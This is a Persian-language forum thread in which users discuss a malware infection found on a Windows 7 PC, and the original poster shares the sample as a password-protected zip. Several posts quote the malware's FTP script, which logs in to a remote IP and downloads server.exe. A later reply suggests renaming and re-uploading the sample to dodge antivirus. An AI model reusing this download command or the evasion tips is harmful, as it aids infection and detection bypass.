اطلاعیه

Collapse
No announcement yet.

یک ویروس....

Collapse
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • یک ویروس....

    امروز روی سیستمم دیدم آنتی ویروس یه فایل host.exe را گرفت !
    برام جالب بود که این ویروسه یهو چطوری آنلاین اومده رو سیستمم... _ win7 (
    یه فایل هم به اسم svchost.exe توی یک فولدر رندوم اجرا کرده بود ! ( چینیهای تخم سگ )

    و یه سوتی ftp هم داده بود :

    open 59.175.153.49
    xzq
    p@ssw0rd
    get server.exe c:\bootserver.exe
    bye

    ---
    پسورد فایل : 123
    فایل های پیوست شده

  • #2
    انتیت چیه؟

    Comment


    • #3
      اویرا اصلا اجازه دانلود نداد.
      صد سال ره مسجد و ميخانه بگيري
      عمرت به هدر رفته اگر دست نگيري

      بشنو از پير خرابات تو اين پند
      هر دست که دادي به همان دست بگيري...

      Comment


      • #4
        نوشته اصلی توسط joker نمایش پست ها
        امروز روی سیستمم دیدم آنتی ویروس یه فایل host.exe را گرفت !
        برام جالب بود که این ویروسه یهو چطوری آنلاین اومده رو سیستمم... _ win7 (
        یه فایل هم به اسم svchost.exe توی یک فولدر رندوم اجرا کرده بود ! ( چینیهای تخم سگ )

        و یه سوتی ftp هم داده بود :

        open 59.175.153.49
        xzq
        p@ssw0rd
        get server.exe c:\bootserver.exe
        bye

        ---
        پسورد فایل : 123
        احیانا جاوا نداری ؟

        Comment


        • #5
          آنتی ویروسش شید هستش

          پس شید کجا بود جوکر؟خواب زمستانی؟
          (◕‿◕)

          Comment


          • #6
            نوشته اصلی توسط Delphi_7 نمایش پست ها
            اویرا اصلا اجازه دانلود نداد.
            آویرا چطوری فایل zip شده ( با پسورد ! ) رو بدون داشتن پسورد اسکن کرد ؟ اونم قبل دانلود... ؟!

            =======
            خب الان دقیقا من متوجه نشدم جریان چیه یه ویروسی که آنتی ویروس ها توانایی شناختن و پاکسازیشو دادن ، گذاشتی که ما هم دوباره آنالیز کنیم یا یه درس عبرتی بشه واسه آینده ی ما ؟

            Comment


            • #7
              نوشته اصلی توسط joker نمایش پست ها
              امروز روی سیستمم دیدم آنتی ویروس یه فایل host.exe را گرفت !
              برام جالب بود که این ویروسه یهو چطوری آنلاین اومده رو سیستمم... _ win7 (
              یه فایل هم به اسم svchost.exe توی یک فولدر رندوم اجرا کرده بود ! ( چینیهای تخم سگ )

              و یه سوتی ftp هم داده بود :

              open 59.175.153.49
              xzq
              p@ssw0rd
              get server.exe c:\bootserver.exe
              bye

              ---
              پسورد فایل : 123
              این روش ارسال لوگ روی isp های ایران کار نیمیکنه و و این که چجوری امدی 100% با Active X اپلودش اجرا شده وارده سایتهایی که شده لوگها و سورس هاشو چک کن و وینت احتمالا 32 بیت هست uac هم بسته هست
              Last edited by keylogger; 01-22-2013, 05:43 PM.

              Comment


              • #8
                این روش ارسال لوگ روی isp های ایران کار نیمیکنه و و این که چجوری امدی 100% با Active X اپلودش اجرا شده وارده سایتهایی که شده لوگها و سورس هاشو چک کن و وینت احتمالا 32 بیت هست uac هم بسته هست
                آره uac هم درد ناچاري ديزيبله و 32 بيتي هم هست.

                نوشته اصلی توسط member11316 نمایش پست ها
                آنتی ویروسش شید هستش
                پس شید کجا بود جوکر؟خواب زمستانی؟
                پس فكر كردي چي بود گرفتش
                جاوا jdk هم دارم ، احتمالش هست اين باگ آخريه جاوا باشه

                خب الان دقیقا من متوجه نشدم جریان چیه یه ویروسی که آنتی ویروس ها توانایی شناختن و پاکسازیشو دادن ، گذاشتی که ما هم دوباره آنالیز کنیم یا یه درس عبرتی بشه واسه آینده ی ما ؟
                برام جالب بود روش آلوده كردنش ، چون كلا از IE استفاده نميكنم كه اكتيو ايكسي لود بشه.

                Comment


                • #9
                  اکتیواکسی نیست و مولتی پلتفرمه . خیلی ناز و شیرین جاوا اپدیت 7 تا 10 رو اکسپلویت میکنه

                  Comment


                  • #10
                    نود 32 نسخه 6 هم موقع دانلود گرفتش !
                    چطوری با وجود پسورد قبل از باز کردن فايل ، آنتی ويروس محتويات فايل رو اسکن ميکنه ؟
                    2013/01/24 04:08:06 ب.ظ Real-time file system protection file C:\DOCUME~1\DEAR-U~1\LOCALS~1\Temp\XMRXhnkS.zip.part Win32/Bagle.gen.zip worm cleaned by deleting - quarantined COMPUTER1\Dear-User Event occurred on a file modified by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
                    حقيقت طنز است


                    .

                    Comment


                    • #11
                      من فکر می کنیم url رو جز malicious url هاست و برای همون وقتی از این url فایل دانلود بشه . فایل رو ویروس شناسایی می کنه .
                      می خواین فایل رو در یک سایت دیگه آپلود کنید تا ببینید باز هم میشناسه یا نه !!
                      My Crime Is My Advisory

                      Hacking Is The Best But Security Is The First

                      My Crime Is That Of Curiosity

                      هميشه راهي براي نفوذ است و هيچ سيستمي به طور مطلق امن نيست. بلكه بايستي آن راه نفوذ را كشف كرد .هنر هك هم در همين نكته متبلور ميشود

                      Best Secure Hosting

                      قبل پست دادن اینو بخون

                      Comment


                      • #12
                        من nod32 ندارم کاسپرم اما یکی اینکه یک جا دیگه اپلود کن باز اگه گیر داد اسم فایل رو عوض کن باز اگه گیر داد شاید نود میاد پسورد ها رو 123 یا 123456 رو چک میکنه که کمی غیر ممکنه عوضش کن به یک پسورد بهتر

                        حالا باحال این میشه باز تشخیص بده :دی
                        ...

                        Comment

                        Working...
                        X